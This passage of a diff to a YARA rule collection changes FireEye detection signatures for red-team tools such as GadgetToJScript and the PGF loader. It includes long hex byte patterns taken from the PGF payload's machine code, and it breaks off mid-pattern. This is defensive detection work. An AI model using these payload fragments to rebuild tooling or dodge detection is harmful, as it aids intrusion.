license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "fa255fdc88ab656ad9bc383f9b322a76" - logic_hash = "487d8e8deef218412f241d99ce32b63bfeb3568d23048b9dd4afff8f401bfea5" + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "aedae87d84275f6589c982c04175ddc0aee3e4f3ae959ced4b4e2294675522e6" score = 75 quality = 73 tags = "FILE" rev = 2 strings: - $typelibguid1 = "AF9C62A1-F8D2-4BE0-B019-0A7873E81EA9" ascii nocase wide - - condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and $typelibguid1 -} -rule FIREEYE_RT_Hunting_Gadgettojscript_1 -{ - meta: - description = "This rule is looking for B64 offsets of LazyNetToJscriptLoader which is a namespace specific to the internal version of the GadgetToJScript tooling." - author = "FireEye" - id = "76c932e0-55b3-56ef-bab6-eb6997b51ee7" - date = "2020-12-09" - modified = "2020-12-09" - reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/G2JS/production/yara/Hunting_GadgetToJScript_1.yar#L4-L17" - license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "7af24305a409a2b8f83ece27bb0f7900" - logic_hash = "a880c20e61376dacd4e3a04f2cf065f19067c29371180b1dec186172cadf9564" - score = 50 - quality = 75 - tags = "" - rev = 4 - - strings: - $s1 = "GF6eU5ldFRvSnNjcmlwdExvYWRl" - $s2 = "henlOZXRUb0pzY3JpcHRMb2Fk" - $s3 = "YXp5TmV0VG9Kc2NyaXB0TG9hZGV" + $typelibguid0 = "d16ed275-70d5-4ae5-8ce7-d249f967616c" ascii nocase wide condition: - any of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } rule FIREEYE_RT_Hunting_B64Engine_Dotnettojscript_Dos { @@ -124668,813 +126995,791 @@ rule FIREEYE_RT_Hunting_B64Engine_Dotnettojscript_Dos condition: $b64_mz } -rule FIREEYE_RT_APT_Loader_Win32_PGF_3 : FILE +rule FIREEYE_RT_Builder_MSIL_G2JS_1 : FILE { meta: - description = "PGF payload, generated rule based on symfunc/c02594972dbab6d489b46c5dee059e66. Identifies dllmain_hook x86 payloads." + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the Gadget2JScript project." author = "FireEye" - id = "adf91482-6e04-5d11-bc00-4b1c7a802c49" + id = "484202c2-ac7d-5e6c-8bf1-3452a357c668" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win32_PGF_3.yar#L4-L20" - license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "4414953fa397a41156f6fa4f9462d207" - logic_hash = "24d2caad1d740ccbff0cf111a05ecad20ed06f311d530d8de86050d916da32ce" - score = 75 - quality = 75 - tags = "FILE" - rev = 4 - - strings: - $cond1 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 2C F9 FF FF 90 EE 01 6D C7 85 30 F9 FF FF 6C FE 01 6D 8D 85 34 F9 FF FF 89 28 BA CC 19 00 6D 89 50 04 89 60 08 8D 85 14 F9 FF FF 89 04 24 E8 BB A6 00 00 A1 48 A1 05 6D C7 85 18 F9 FF FF FF FF FF FF FF D0 C7 44 24 08 04 01 00 00 8D 95 B6 FD FF FF 89 54 24 04 89 04 24 E8 B8 AE 00 00 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 8B 03 00 00 8D 45 BF 89 C1 E8 56 0B 01 00 8D 85 9C FD FF FF 8D 55 BF 89 54 24 04 8D 95 B6 FD FF FF 89 14 24 C7 85 18 F9 FF FF 01 00 00 00 89 C1 E8 DF B5 01 00 83 EC 08 8D 45 BF 89 C1 E8 52 0B 01 00 A1 4C A1 05 6D C7 85 18 F9 FF FF 02 00 00 00 FF D0 89 44 24 04 C7 04 24 08 00 00 00 E8 51 AE 00 00 83 EC 08 89 45 D0 83 7D D0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 8C 02 00 00 C7 45 E4 00 00 00 00 C7 45 E0 00 00 00 00 C7 85 74 F9 FF FF 28 04 00 00 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 EF AD 00 00 83 EC 08 89 45 DC 83 7D DC 00 74 67 8D 85 9C FD FF FF C7 44 24 04 00 00 00 00 8D 95 74 F9 FF FF 83 C2 20 89 14 24 89 C1 E8 82 FF 00 00 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 12 8B 85 88 F9 FF FF 89 45 E4 8B 85 8C F9 FF FF 89 45 E0 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 84 AD 00 00 83 EC 08 89 45 DC EB 93 8B 45 D0 89 04 24 A1 2C A1 05 6D C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 83 7D E4 00 74 06 83 7D E0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 AD 01 00 00 C7 04 24 0C 40 05 6D A1 5C A1 05 6D C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 C7 44 24 04 18 40 05 6D 89 04 24 A1 60 A1 05 6D FF D0 83 EC 08 89 45 CC 89 E8 89 45 D8 8D 85 6C F9 FF FF 89 44 24 04 8D 85 70 F9 FF FF 89 04 24 A1 54 A1 05 6D FF D0 83 EC 08 C7 45 D4 00 00 00 00 8B 55 D8 8B 85 6C F9 FF FF 39 C2 0F 83 F5 00 00 00 8B 45 D8 8B 00 3D FF 0F 00 00 0F 86 D8 00 00 00 8B 45 D8 8B 00 39 45 CC 73 19 8B 45 D8 8B 00 8B 55 CC 81 C2 00 10 00 00 39 D0 73 07 C7 45 D4 01 00 00 00 83 7D D4 00 0F 84 AF 00 00 00 8B 45 D8 8B 00 39 45 E4 0F 83 A1 00 00 00 8B 45 D8 8B 00 8B 4D E4 8B 55 E0 01 CA 39 D0 0F 83 8C 00 00 00 B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 50 F9 FF FF 83 C0 04 39 D0 72 F2 8B 45 D8 8B 00 C7 44 24 08 1C 00 00 00 8D 95 50 F9 FF FF 89 54 24 04 89 04 24 A1 9C A1 05 6D C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 0C 8B 85 64 F9 FF FF 83 E0 20 85 C0 74 2E 8B 45 D8 8B 00 C7 44 24 04 30 14 00 6D 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 59 FC FF FF C7 85 10 F9 FF FF 00 00 00 00 EB 58 90 EB 01 90 83 45 D8 04 E9 FA FE FF FF 8B 45 E4 89 45 C8 8B 45 C8 8B 40 3C 89 C2 8B 45 E4 01 D0 89 45 C4 8B 45 C4 8B 50 28 8B 45 E4 01 D0 89 45 C0 C7 44 24 04 30 14 00 6D 8B 45 C0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 FF FB FF FF C7 85 10 F9 FF FF 01 00 00 00 8D 85 9C FD FF FF 89 C1 E8 5D BC 01 00 83 BD 10 F9 FF FF 01 EB 70 8B 95 1C F9 FF FF 8B 85 18 F9 FF FF 85 C0 74 0C 83 E8 01 85 C0 74 2D 83 E8 01 0F 0B 89 95 10 F9 FF FF 8D 45 BF 89 C1 E8 48 08 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 A0 A6 00 00 89 95 10 F9 FF FF 8D 85 9C FD FF FF 89 C1 E8 FD BB 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 75 A6 00 00 90 8D 85 14 F9 FF FF 89 04 24 E8 76 A3 00 00 8D 65 F4 5B 5E 5F 5D C3 } - $cond2 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 2C F9 FF FF B0 EF 3D 6A C7 85 30 F9 FF FF 8C FF 3D 6A 8D 85 34 F9 FF FF 89 28 BA F4 1A 3C 6A 89 50 04 89 60 08 8D 85 14 F9 FF FF 89 04 24 E8 B3 A6 00 00 A1 64 A1 41 6A C7 85 18 F9 FF FF FF FF FF FF FF D0 C7 44 24 08 04 01 00 00 8D 95 B6 FD FF FF 89 54 24 04 89 04 24 E8 B0 AE 00 00 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 8B 03 00 00 8D 45 BF 89 C1 E8 4E 0B 01 00 8D 85 9C FD FF FF 8D 55 BF 89 54 24 04 8D 95 B6 FD FF FF 89 14 24 C7 85 18 F9 FF FF 01 00 00 00 89 C1 E8 D7 B5 01 00 83 EC 08 8D 45 BF 89 C1 E8 4A 0B 01 00 A1 68 A1 41 6A C7 85 18 F9 FF FF 02 00 00 00 FF D0 89 44 24 04 C7 04 24 08 00 00 00 E8 49 AE 00 00 83 EC 08 89 45 D0 83 7D D0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 8C 02 00 00 C7 45 E4 00 00 00 00 C7 45 E0 00 00 00 00 C7 85 74 F9 FF FF 28 04 00 00 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 E7 AD 00 00 83 EC 08 89 45 DC 83 7D DC 00 74 67 8D 85 9C FD FF FF C7 44 24 04 00 00 00 00 8D 95 74 F9 FF FF 83 C2 20 89 14 24 89 C1 E8 7A FF 00 00 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 12 8B 85 88 F9 FF FF 89 45 E4 8B 85 8C F9 FF FF 89 45 E0 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 7C AD 00 00 83 EC 08 89 45 DC EB 93 8B 45 D0 89 04 24 A1 44 A1 41 6A C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 83 7D E4 00 74 06 83 7D E0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 AD 01 00 00 C7 04 24 62 40 41 6A A1 78 A1 41 6A C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 C7 44 24 04 6E 40 41 6A 89 04 24 A1 7C A1 41 6A FF D0 83 EC 08 89 45 CC 89 E8 89 45 D8 8D 85 6C F9 FF FF 89 44 24 04 8D 85 70 F9 FF FF 89 04 24 A1 70 A1 41 6A FF D0 83 EC 08 C7 45 D4 00 00 00 00 8B 55 D8 8B 85 6C F9 FF FF 39 C2 0F 83 F5 00 00 00 8B 45 D8 8B 00 3D FF 0F 00 00 0F 86 D8 00 00 00 8B 45 D8 8B 00 39 45 CC 73 19 8B 45 D8 8B 00 8B 55 CC 81 C2 00 10 00 00 39 D0 73 07 C7 45 D4 01 00 00 00 83 7D D4 00 0F 84 AF 00 00 00 8B 45 D8 8B 00 39 45 E4 0F 83 A1 00 00 00 8B 45 D8 8B 00 8B 4D E4 8B 55 E0 01 CA 39 D0 0F 83 8C 00 00 00 B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 50 F9 FF FF 83 C0 04 39 D0 72 F2 8B 45 D8 8B 00 C7 44 24 08 1C 00 00 00 8D 95 50 F9 FF FF 89 54 24 04 89 04 24 A1 C8 A1 41 6A C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 0C 8B 85 64 F9 FF FF 83 E0 20 85 C0 74 2E 8B 45 D8 8B 00 C7 44 24 04 30 14 3C 6A 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 59 FC FF FF C7 85 10 F9 FF FF 00 00 00 00 EB 58 90 EB 01 90 83 45 D8 04 E9 FA FE FF FF 8B 45 E4 89 45 C8 8B 45 C8 8B 40 3C 89 C2 8B 45 E4 01 D0 89 45 C4 8B 45 C4 8B 50 28 8B 45 E4 01 D0 89 45 C0 C7 44 24 04 30 14 3C 6A 8B 45 C0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 FF FB FF FF C7 85 10 F9 FF FF 01 00 00 00 8D 85 9C FD FF FF 89 C1 E8 55 BC 01 00 83 BD 10 F9 FF FF 01 EB 70 8B 95 1C F9 FF FF 8B 85 18 F9 FF FF 85 C0 74 0C 83 E8 01 85 C0 74 2D 83 E8 01 0F 0B 89 95 10 F9 FF FF 8D 45 BF 89 C1 E8 40 08 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 98 A6 00 00 89 95 10 F9 FF FF 8D 85 9C FD FF FF 89 C1 E8 F5 BB 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 6D A6 00 00 90 8D 85 14 F9 FF FF 89 04 24 E8 6E A3 00 00 8D 65 F4 5B 5E 5F 5D C3 } - $cond3 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 2C F9 FF FF F0 EF D5 63 C7 85 30 F9 FF FF CC FF D5 63 8D 85 34 F9 FF FF 89 28 BA 28 1B D4 63 89 50 04 89 60 08 8D 85 14 F9 FF FF 89 04 24 E8 BF A6 00 00 A1 64 A1 D9 63 C7 85 18 F9 FF FF FF FF FF FF FF D0 C7 44 24 08 04 01 00 00 8D 95 B6 FD FF FF 89 54 24 04 89 04 24 E8 BC AE 00 00 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 8B 03 00 00 8D 45 BF 89 C1 E8 5A 0B 01 00 8D 85 9C FD FF FF 8D 55 BF 89 54 24 04 8D 95 B6 FD FF FF 89 14 24 C7 85 18 F9 FF FF 01 00 00 00 89 C1 E8 E3 B5 01 00 83 EC 08 8D 45 BF 89 C1 E8 56 0B 01 00 A1 68 A1 D9 63 C7 85 18 F9 FF FF 02 00 00 00 FF D0 89 44 24 04 C7 04 24 08 00 00 00 E8 55 AE 00 00 83 EC 08 89 45 D0 83 7D D0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 8C 02 00 00 C7 45 E4 00 00 00 00 C7 45 E0 00 00 00 00 C7 85 74 F9 FF FF 28 04 00 00 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 F3 AD 00 00 83 EC 08 89 45 DC 83 7D DC 00 74 67 8D 85 9C FD FF FF C7 44 24 04 00 00 00 00 8D 95 74 F9 FF FF 83 C2 20 89 14 24 89 C1 E8 86 FF 00 00 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 12 8B 85 88 F9 FF FF 89 45 E4 8B 85 8C F9 FF FF 89 45 E0 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 88 AD 00 00 83 EC 08 89 45 DC EB 93 8B 45 D0 89 04 24 A1 44 A1 D9 63 C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 83 7D E4 00 74 06 83 7D E0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 AD 01 00 00 C7 04 24 7E 40 D9 63 A1 7C A1 D9 63 C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 C7 44 24 04 8A 40 D9 63 89 04 24 A1 80 A1 D9 63 FF D0 83 EC 08 89 45 CC 89 E8 89 45 D8 8D 85 6C F9 FF FF 89 44 24 04 8D 85 70 F9 FF FF 89 04 24 A1 70 A1 D9 63 FF D0 83 EC 08 C7 45 D4 00 00 00 00 8B 55 D8 8B 85 6C F9 FF FF 39 C2 0F 83 F5 00 00 00 8B 45 D8 8B 00 3D FF 0F 00 00 0F 86 D8 00 00 00 8B 45 D8 8B 00 39 45 CC 73 19 8B 45 D8 8B 00 8B 55 CC 81 C2 00 10 00 00 39 D0 73 07 C7 45 D4 01 00 00 00 83 7D D4 00 0F 84 AF 00 00 00 8B 45 D8 8B 00 39 45 E4 0F 83 A1 00 00 00 8B 45 D8 8B 00 8B 4D E4 8B 55 E0 01 CA 39 D0 0F 83 8C 00 00 00 B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 50 F9 FF FF 83 C0 04 39 D0 72 F2 8B 45 D8 8B 00 C7 44 24 08 1C 00 00 00 8D 95 50 F9 FF FF 89 54 24 04 89 04 24 A1 C8 A1 D9 63 C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 0C 8B 85 64 F9 FF FF 83 E0 20 85 C0 74 2E 8B 45 D8 8B 00 C7 44 24 04 30 14 D4 63 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 59 FC FF FF C7 85 10 F9 FF FF 00 00 00 00 EB 58 90 EB 01 90 83 45 D8 04 E9 FA FE FF FF 8B 45 E4 89 45 C8 8B 45 C8 8B 40 3C 89 C2 8B 45 E4 01 D0 89 45 C4 8B 45 C4 8B 50 28 8B 45 E4 01 D0 89 45 C0 C7 44 24 04 30 14 D4 63 8B 45 C0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 FF FB FF FF C7 85 10 F9 FF FF 01 00 00 00 8D 85 9C FD FF FF 89 C1 E8 61 BC 01 00 83 BD 10 F9 FF FF 01 EB 70 8B 95 1C F9 FF FF 8B 85 18 F9 FF FF 85 C0 74 0C 83 E8 01 85 C0 74 2D 83 E8 01 0F 0B 89 95 10 F9 FF FF 8D 45 BF 89 C1 E8 4C 08 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 A4 A6 00 00 89 95 10 F9 FF FF 8D 85 9C FD FF FF 89 C1 E8 01 BC 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 79 A6 00 00 90 8D 85 14 F9 FF FF 89 04 24 E8 7A A3 00 00 8D 65 F4 5B 5E 5F 5D C3 } - $cond4 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 ?? ?? ?? ?? 90 EE 01 6D C7 85 ?? ?? ?? ?? 6C FE 01 6D 8D 85 ?? ?? ?? ?? 89 28 BA CC 19 00 6D 89 50 ?? 89 60 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? FF FF FF FF FF D0 C7 44 24 ?? 04 01 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 55 ?? 89 54 24 ?? 8D 95 ?? ?? ?? ?? 89 14 24 C7 85 ?? ?? ?? ?? 01 00 00 00 89 C1 E8 ?? ?? ?? ?? 83 EC 08 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 89 44 24 ?? C7 04 24 08 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 28 04 00 00 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 74 ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? 00 00 00 00 8D 95 ?? ?? ?? ?? 83 C2 20 89 14 24 89 C1 E8 ?? ?? ?? ?? 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? EB ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 83 7D ?? 00 74 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 04 24 0C 40 05 6D A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 C7 44 24 ?? 18 40 05 6D 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 89 45 ?? 89 E8 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 C7 45 ?? 00 00 00 00 8B 55 ?? 8B 85 ?? ?? ?? ?? 39 C2 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 3D FF 0F 00 00 0F 86 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 73 ?? 8B 45 ?? 8B 00 8B 55 ?? 81 C2 00 10 00 00 39 D0 73 ?? C7 45 ?? 01 00 00 00 83 7D ?? 00 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 8B 4D ?? 8B 55 ?? 01 CA 39 D0 0F 83 ?? ?? ?? ?? B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 ?? ?? ?? ?? 83 C0 04 39 D0 72 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 1C 00 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 0C 8B 85 ?? ?? ?? ?? 83 E0 20 85 C0 74 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 30 14 00 6D 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 00 00 00 00 EB ?? 90 EB ?? 90 83 45 ?? 04 E9 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 89 C2 8B 45 ?? 01 D0 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 01 D0 89 45 ?? C7 44 24 ?? 30 14 00 6D 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 01 00 00 00 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 01 EB ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 83 E8 01 85 C0 74 ?? 83 E8 01 0F 0B 89 95 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 90 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C3 } - $cond5 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 ?? ?? ?? ?? B0 EF 3D 6A C7 85 ?? ?? ?? ?? 8C FF 3D 6A 8D 85 ?? ?? ?? ?? 89 28 BA F4 1A 3C 6A 89 50 ?? 89 60 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? FF FF FF FF FF D0 C7 44 24 ?? 04 01 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 55 ?? 89 54 24 ?? 8D 95 ?? ?? ?? ?? 89 14 24 C7 85 ?? ?? ?? ?? 01 00 00 00 89 C1 E8 ?? ?? ?? ?? 83 EC 08 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 89 44 24 ?? C7 04 24 08 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 28 04 00 00 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 74 ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? 00 00 00 00 8D 95 ?? ?? ?? ?? 83 C2 20 89 14 24 89 C1 E8 ?? ?? ?? ?? 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? EB ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 83 7D ?? 00 74 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 04 24 62 40 41 6A A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 C7 44 24 ?? 6E 40 41 6A 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 89 45 ?? 89 E8 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 C7 45 ?? 00 00 00 00 8B 55 ?? 8B 85 ?? ?? ?? ?? 39 C2 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 3D FF 0F 00 00 0F 86 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 73 ?? 8B 45 ?? 8B 00 8B 55 ?? 81 C2 00 10 00 00 39 D0 73 ?? C7 45 ?? 01 00 00 00 83 7D ?? 00 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 8B 4D ?? 8B 55 ?? 01 CA 39 D0 0F 83 ?? ?? ?? ?? B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 ?? ?? ?? ?? 83 C0 04 39 D0 72 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 1C 00 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 0C 8B 85 ?? ?? ?? ?? 83 E0 20 85 C0 74 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 30 14 3C 6A 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 00 00 00 00 EB ?? 90 EB ?? 90 83 45 ?? 04 E9 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 89 C2 8B 45 ?? 01 D0 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 01 D0 89 45 ?? C7 44 24 ?? 30 14 3C 6A 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 01 00 00 00 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 01 EB ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 83 E8 01 85 C0 74 ?? 83 E8 01 0F 0B 89 95 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 90 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C3 } - $cond6 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 ?? ?? ?? ?? F0 